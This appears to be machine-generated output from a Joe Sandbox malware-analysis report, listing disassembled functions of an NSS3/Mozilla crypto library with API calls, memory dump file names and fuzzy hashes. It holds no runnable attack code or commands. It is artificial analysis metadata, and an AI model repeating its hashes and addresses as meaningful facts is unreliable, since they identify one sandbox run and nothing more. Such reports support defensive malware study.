• Instruction Fuzzy Hash: 78A1CFB5E002159BEF00DF64DC45FAABBB4EF09309F144128E809AB751E731E999CBE1
APIs
• SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A1860
• memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF), ref: 6C4A1897
• memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4A18AA
• memcpy.VCRUNTIME140(?,?,?), ref: 6C4A18C4
• PK11_ImportDataKey.NSS3(00000000,0000402B,00000004,0000010C,?,00000000), ref: 6C4A193F
• PK11_DeriveWithTemplate.NSS3 ref: 6C4A1979
• PK11_ExtractKeyValue.NSS3(00000000), ref: 6C4A1988
• PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash,0000000B), ref: 6C4A199F
• PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash), ref: 6C4A19A8
  • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
  • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
  • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
  • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
  • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
  • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
  • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
• SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001), ref: 6C4A19B6
  • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
• SECITEM_DupItem_Util.NSS3(-00000018), ref: 6C4A19F2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: K11_$Item_UtilValuememcpy$CriticalEnterFreeSectionfree$AllocDataDeriveExtractImportTemplateUnlockWithZfreememset
• String ID: +@$E-v1
• API String ID: 3144289787-3744174662
• Opcode ID: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
• Instruction ID: a36e628f516a4df30d9bf88ead9c21b7f3e733578c029e579f68a6e5856d7899
• Opcode Fuzzy Hash: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
• Instruction Fuzzy Hash: 0951A1B6A043019BE700DF69CC40EABB7F8AF98318F04892CE99897751F735D549CB96
APIs
• TlsGetValue.KERNEL32(#?Il,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C62
• EnterCriticalSection.KERNEL32(0000001C,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C76
• PL_HashTableLookup.NSS3(00000000,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C86
• PR_Unlock.NSS3(00000000,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C93
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• TlsGetValue.KERNEL32(?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CC6
• EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CDA
• PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23), ref: 6C492CEA
• PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492CF7
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492D4D
• EnterCriticalSection.KERNEL32(?), ref: 6C492D61
• PL_HashTableLookup.NSS3(?,?), ref: 6C492D71
• PR_Unlock.NSS3(?), ref: 6C492D7E
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
• String ID: #?Il
• API String ID: 2446853827-3645613150
• Opcode ID: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
• Instruction ID: 7d1eb7de6c9cb28985a7849adc07e7a1bab1163eac542aaa9ae28728dafe65d9
• Opcode Fuzzy Hash: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
• Instruction Fuzzy Hash: 7E510576D00614ABEB10DF24DC44CAABB78BF1925CB058628EC199BB11EB31FD64C7E1
APIs
• SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EADB1
  • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
• PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C4EADF4
• SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C4EAE08
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4EAE25
• PL_FreeArenaPool.NSS3 ref: 6C4EAE63
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAE4D
  • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
  • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
  • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAE93
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAECC
• PL_FreeArenaPool.NSS3 ref: 6C4EAEDE
• PL_FinishArenaPool.NSS3 ref: 6C4EAEE6
• PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAEF5
• PL_FinishArenaPool.NSS3 ref: 6C4EAF16
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
• String ID: security
• API String ID: 3441714441-3315324353
• Opcode ID: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
• Instruction ID: 69d4db248a2457f138938533c6f96028f4a2c54286beabd337b85af67d1ceaa8
• Opcode Fuzzy Hash: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
• Instruction Fuzzy Hash: C24128B198421067E720DB2C9C45FAA36B8EF4A31FF120929E81496F41FB35A90986D7
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58AF88
                                                                                                                                                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C58AFCE
                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C58AFD9
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58AFEF
                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C58B00F
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B02F
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B070
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B07B
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B084
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58B09B
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B0C4
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B0F3
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B0FC
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B137
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B140
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 235599594-0
                                                                                                                                                                                                                          • Opcode ID: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                          • Instruction ID: 53a065a8bdd7af5a03b410e6e3f8fbb46bdb11b6992e07d4f373d094171f7cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD914EB5901621DFCB00DF15CC8085ABBF5FF893187298569D8199BB22E732FD46CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502BF0
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C07
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C1E
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: free.MOZGLUE(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C4A
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D0F
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D4E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D62
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D85
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D99
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505DFA
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E33
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E3E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E47
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E60
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E78
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EB9
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EF0
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F3D
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4273776295-0
                                                                                                                                                                                                                          • Opcode ID: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                          • Instruction ID: 95fc93a99129fb44058bec2712c4c1a0bd3e7b655513e6d549f7dd94d7f6bee7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29719CB5A00B019FD710CF20DC88A96B7E5FF89308F148529E85E87B11EB32FA55CB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C488E22
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C488E36
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488E4F
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C488E78
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488E9B
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C488EAC
                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C488EDE
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488EF0
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F00
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C488F0E
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C488F39
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F4A
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F5B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C488F72
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C488F82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
• String ID:
• API String ID: 1569127702-0
• Opcode ID: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
• Instruction ID: a745584637d8cc5bc10e931b35f04d6af9d19015eb49c830e6087c2b27b1739d
• Opcode Fuzzy Hash: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
• Instruction Fuzzy Hash: C751E2B2E022159FEB00DF68CC84D6EB7B9EF85358B154129EC089B700E731ED4587E1
APIs
• PR_Lock.NSS3(?), ref: 6C581000
  • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
  • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
• PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C581016
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PR_Unlock.NSS3(?), ref: 6C581021
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581046
• PR_Unlock.NSS3(?), ref: 6C58106B
• PR_Lock.NSS3 ref: 6C581079
• PR_Unlock.NSS3 ref: 6C581096
• free.MOZGLUE(?), ref: 6C5810A7
• free.MOZGLUE(?), ref: 6C5810B4
• PR_DestroyCondVar.NSS3(?), ref: 6C5810BF
• PR_DestroyCondVar.NSS3(?), ref: 6C5810CA
• PR_DestroyCondVar.NSS3(?), ref: 6C5810D5
• PR_DestroyCondVar.NSS3(?), ref: 6C5810E0
• PR_DestroyLock.NSS3(?), ref: 6C5810EB
• free.MOZGLUE(?), ref: 6C581105
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
• String ID:
• API String ID: 8544004-0
• Opcode ID: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
• Instruction ID: 2c9ec5b42914452ba726b27b2f2fafc9b983fc7b437cc0c5fd2619e3603cbfa7
• Opcode Fuzzy Hash: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
• Instruction Fuzzy Hash: 1D31ABB5905511EBE702AF11EC45A46B771FF41358B184134E80902F61E732FD78DBC6
APIs
• memcpy.VCRUNTIME140(?,?,?), ref: 6C3FDD56
• memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C3FDD7C
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C3FDE67
• memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C3FDEC4
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FDECD
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memcpy$_byteswap_ulong
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 2339628231-598938438
• Opcode ID: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
• Instruction ID: d0f333e8b8df637d46ff0cc7fdd9f33db8f665a928ad4c3e354ca7e95eeb0057
• Opcode Fuzzy Hash: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
• Instruction Fuzzy Hash: 8EA1E4716043019BD710DF29C884A6AB7F5AF95308F058D2DF8A98BB41E731E846CFA2
APIs
• PORT_Alloc_Util.NSS3(?), ref: 6C4BEE0B
  • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
  • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4BEEE1
  • Part of subcall function 6C4B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C4B1D7E
  • Part of subcall function 6C4B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C4B1D8E
  • Part of subcall function 6C4B1D50: PR_Unlock.NSS3(?), ref: 6C4B1DD3
• TlsGetValue.KERNEL32 ref: 6C4BEE51
• EnterCriticalSection.KERNEL32(?), ref: 6C4BEE65
• PR_Unlock.NSS3(?), ref: 6C4BEEA2
• free.MOZGLUE(?), ref: 6C4BEEBB
• PR_SetError.NSS3(00000000,00000000), ref: 6C4BEED0
• PR_Unlock.NSS3(?), ref: 6C4BEF48
• free.MOZGLUE(?), ref: 6C4BEF68
• PR_SetError.NSS3(00000000,00000000), ref: 6C4BEF7D
• PK11_DoesMechanism.NSS3(?,?), ref: 6C4BEFA4
• free.MOZGLUE(?), ref: 6C4BEFDA
• PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BF055
• free.MOZGLUE(?), ref: 6C4BF060
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
